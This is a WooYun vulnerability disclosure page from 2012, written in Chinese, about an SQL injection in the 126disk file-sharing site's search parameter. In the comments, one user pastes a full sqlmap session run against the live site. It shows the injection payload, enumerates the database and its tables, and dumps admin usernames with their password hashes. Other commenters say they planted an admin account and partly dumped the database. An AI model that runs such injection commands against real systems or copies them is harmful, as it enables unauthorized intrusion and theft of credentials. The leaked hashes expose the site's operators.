漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-013279
漏洞标题:126网盘注射,沦陷后台,用户敏感信息泄露
相关厂商:126网盘
漏洞作者: Night
提交时间:2012-10-16 12:09
修复时间:2012-11-30 12:09
公开时间:2012-11-30 12:09
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-10-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-11-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
126网盘爆搜索型注册
详细说明:
注射地址:http://so.126disk.com/search?key=A'
前位置:文件搜索 -> A'文件分类文件名称扩展大小上传时间You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and shenhe<5 and gongxiang='0' and list_d>0 and list_x>0' at line 1
漏洞证明:
修复方案:
你们的专业
版权声明:转载请注明来源 Night@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞评价:
评论
- 2012-10-24 01:45 | Any ( 路人 | Rank:26 漏洞数:5 | 待我八块腹肌时,姑娘嫁我可否?)
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:23:31[00:23:55] [INFO] testing connection to the target url[00:24:14] [INFO] testing if the url is stable, wait a few seconds[00:24:15] [INFO] url is stable[00:24:15] [INFO] testing if GET parameter 'key' is dynamic[00:24:15] [INFO] confirming that GET parameter 'key' is dynamic[00:24:18] [WARNING] GET parameter 'key' appears to be not dynamic[00:24:19] [WARNING] reflective value(s) found and filtering out[00:24:19] [INFO] heuristic test shows that GET parameter 'key' might be injectable (possible DBMS: MySQL)[00:24:19] [INFO] testing for SQL injection on GET parameter 'key'[00:24:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:24:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:24:25] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [00:24:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:24:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:24:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[00:24:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found[00:25:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'GET parameter 'key' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 58 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:26:20] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[00:26:20] [INFO] fetching database names[00:26:21] [INFO] the SQL query used returns 2 entries[00:26:21] [INFO] retrieved: information_schema[00:26:21] [INFO] retrieved: 126diskavailable databases [2]:[*] 126disk[*] information_schema[00:26:21] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'[*] shutting down at 00:26:21root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --tables -D"126disk" sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:31:30[00:31:48] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:32:06] [INFO] testing MySQL[00:32:06] [WARNING] reflective value(s) found and filtering out[00:32:06] [INFO] confirming MySQL[00:32:07] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[00:32:07] [INFO] fetching tables for database: '126disk'[00:32:07] [INFO] the SQL query used returns 24 entries[00:32:08] [INFO] retrieved: disk_admin[00:32:08] [INFO] retrieved: disk_adminlog[00:32:08] [INFO] retrieved: disk_adminmsg[00:32:08] [INFO] retrieved: disk_collection[00:32:09] [INFO] retrieved: disk_count[00:32:09] [INFO] retrieved: disk_file[00:32:09] [INFO] retrieved: disk_gonggao[00:32:10] [INFO] retrieved: disk_guolv[00:32:10] [INFO] retrieved: disk_haoyou[00:32:10] [INFO] retrieved: disk_integral[00:32:10] [INFO] retrieved: disk_integrallog[00:32:10] [INFO] retrieved: disk_jubao[00:32:11] [INFO] retrieved: disk_link[00:32:11] [INFO] retrieved: disk_links[00:32:11] [INFO] retrieved: disk_message[00:32:11] [INFO] retrieved: disk_mulu[00:32:11] [INFO] retrieved: disk_search[00:32:11] [INFO] retrieved: disk_server[00:32:12] [INFO] retrieved: disk_tag[00:32:12] [INFO] retrieved: disk_type[00:32:12] [INFO] retrieved: disk_user[00:32:13] [INFO] retrieved: disk_userlog[00:32:13] [INFO] retrieved: disk_visitors[00:32:13] [INFO] retrieved: disk_zhuanjiDatabase: 126disk[24 tables]+------------------+| disk_admin || disk_adminlog || disk_adminmsg || disk_collection || disk_count || disk_file || disk_gonggao || disk_guolv || disk_haoyou || disk_integral || disk_integrallog || disk_jubao || disk_link || disk_links || disk_message || disk_mulu || disk_search || disk_server || disk_tag || disk_type || disk_user || disk_userlog || disk_visitors || disk_zhuanji |+------------------+[00:32:13] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'[*] shutting down at 00:32:13root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --columns -T"disk_admin" -D"126disk" sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:33:20[00:33:38] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:33:56] [INFO] testing MySQL[00:33:56] [INFO] confirming MySQL[00:33:56] [WARNING] reflective value(s) found and filtering out[00:33:56] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[00:33:56] [INFO] fetching columns for table 'disk_admin' in database '126disk'[00:33:57] [INFO] the SQL query used returns 4 entries[00:34:00] [INFO] retrieved: id[00:34:00] [INFO] retrieved: int(11)[00:34:00] [INFO] retrieved: user[00:34:00] [INFO] retrieved: varchar(20)[00:34:01] [INFO] retrieved: pass[00:34:01] [INFO] retrieved: varchar(32)[00:34:01] [INFO] retrieved: login[00:34:01] [INFO] retrieved: int(11)Database: 126diskTable: disk_admin[4 columns]+--------+-------------+| Column | Type |+--------+-------------+| id | int(11) || login | int(11) || pass | varchar(32) || user | varchar(20) |+--------+-------------+[00:34:01] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'[*] shutting down at 00:34:01root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --dump -C"user,pass" -T"disk_admin" -D"126disk" sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:38:10[00:38:28] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:38:47] [INFO] testing MySQL[00:38:47] [INFO] confirming MySQL[00:38:47] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0do you want sqlmap to consider provided column(s):[1] as LIKE column names (default)[2] as exact column names-v 0[00:45:34] [CRITICAL] invalid value[*] shutting down at 00:45:34root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --dump -C"user,pass" -T"disk_admin" -D"126disk" -v 0 sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:45:58[00:46:16] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:46:34] [INFO] testing MySQL[00:46:34] [INFO] confirming MySQL[00:46:34] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0do you want sqlmap to consider provided column(s):[1] as LIKE column names (default)[2] as exact column names> [00:52:16] [INFO] fetching columns like 'pass, user' for table 'disk_admin' in database '126disk'[00:52:19] [WARNING] reflective value(s) found and filtering out[00:52:19] [INFO] the SQL query used returns 2 entries[00:52:19] [INFO] retrieved: user[00:52:19] [INFO] retrieved: varchar(20)[00:52:19] [INFO] retrieved: pass[00:52:20] [INFO] retrieved: varchar(32)[00:52:20] [INFO] fetching entries of column(s) 'pass, user' for table 'disk_admin' in database '126disk'[00:52:20] [INFO] the SQL query used returns 2 entries[00:52:20] [INFO] retrieved: b4870218d90c9641481d07f9733d281d[00:52:20] [INFO] retrieved: admin1[00:52:20] [INFO] retrieved: f6fbd3b2d7a6740fffc6e645df80e15d[00:52:21] [INFO] retrieved: admin[00:52:21] [INFO] analyzing table dump for possible password hashesrecognized possible password hashes in column 'pass'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y+--------+----------------------------------+| user | pass |+--------+----------------------------------+| admin1 | b4870218d90c9641481d07f9733d281d---245661320| admin | f6fbd3b2d7a6740fffc6e645df80e15d |+--------+----------------------------------+不会是这个漏洞吧??
- 2012-10-30 17:22 | 245661320 ( 路人 | Rank:1 漏洞数:3 | 永无边境的黑暗!)
@Night 我去 没想到这个洞我没发呢你就发促回来了 我在里面添加的管理用户名还有呢 我去去去
- 2012-11-30 14:48 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)
...这库上次脱了一半 太慢了就没拖